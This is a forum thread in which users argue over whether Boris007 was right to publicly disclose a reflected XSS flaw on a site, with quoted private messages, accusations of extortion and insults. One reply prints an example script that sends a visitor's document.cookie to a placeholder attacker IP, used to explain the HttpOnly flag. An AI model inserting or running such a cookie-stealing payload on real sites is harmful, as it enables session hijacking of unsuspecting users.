--

[Boris007]

......I'm a bit confused as to what actually occurred here......
OP, Boris007: did you contact OG before posting this, in an attempt to notify the owner? If this was the case, and Og ignored it, then they had the right to publish their findings. If the server isn't vulnerable anyway, there is no offence in the actions of the OP....

So here is the gist of chat:

Me: Hi I found (XYZ) vulnerability, here is the POC.
OG: I don't run the particular site, BTW he has forwarded the message to nonakip.
Me: Is there any vulnerability bounty award ?? Can we disclose it in public??
OG: I don't run the mentioned site, so Boris007 must contact the naypalm.
Me: Thanks for clarifying that this is not your website.
I do not know who naypalm is and it seems he last logged a week back is very infrequent here.
So I would disclose the vulnerability to the forum(only).

--------------------------
ENd of PM
--------------------------

I don't know how it is extortion?? The thread Vod is a liar must change its title to Base64 (RFC 3548, RFC 4648) T2dOYXN0eQ== is a Liar.

Anyone who thinks I hate Og and created this thread, then answer is NO. I did not know who is OgNasty before a week back. I contacted him as I do with many services. He clearly says he doesn't own the site so I don't know how he comes in between. BTW thankyou for notifying this to naypalm on the very first day before this post.

Bottom line: What much one can do with reflected XSS? It is shit..and again one more shit reflected XSS by boris007 --Bob123456, Cat meow.
Top Line: https://www.dionach.com/blog/the-real-impact-of-cross-site-scripting/  --Security Community
_______________________________________________________________________________ ________

I believe that this thread is losing the path and now taking path hatred, Jealous, personal vendetta. I would close this thread after 12 hours. In case anyone has anything else than hatred and jealousy to post are do welcome.

[Vod]

So, OG lied when he cried extortion?  Not surprised.

[bob123]

[...]
I do not know who naypalm is and it seems he last logged a week back is very infrequent here.
So I would disclose the vulnerability to the forum(only).

--------------------------
ENd of PM
--------------------------

So because he logs in infrequently you decided to publicly disclose it ?
Because you need the attention and can't wait a month or two for it to be fixed ?

Bottom line: What much one can do with reflected XSS? It is shit..and again one more shit reflected XSS by boris007 --Bob123456, Cat meow.
Top Line: https://www.dionach.com/blog/the-real-impact-of-cross-site-scripting/  --Security Community

All you can do is obviously to use the free version of the burp suite and make popups.
You found a reflected XSS, not a persistent one.

You like your low-level examples, i understood this already.

For example, this:

<script>
  image = new Image();
  image.src='https://[Attacker IP]:8080/?'+document.cookie;
</script>

This is only possible, if the HttpOnly flag is not set.
Otherwise the cookie can not be accessed by a script.

All you can do with that is to craft an own URL, and send it to someone to have the script being executed.

How would you exploit that on such a site, where no valuable or sensitive information is being stored/entered anyway?
Short answer: You can't.


You are obviously a script kiddy, breaking laws and being a dick, just to gain some attention.
You don't understand what you actually found and don't know how this could be exploited.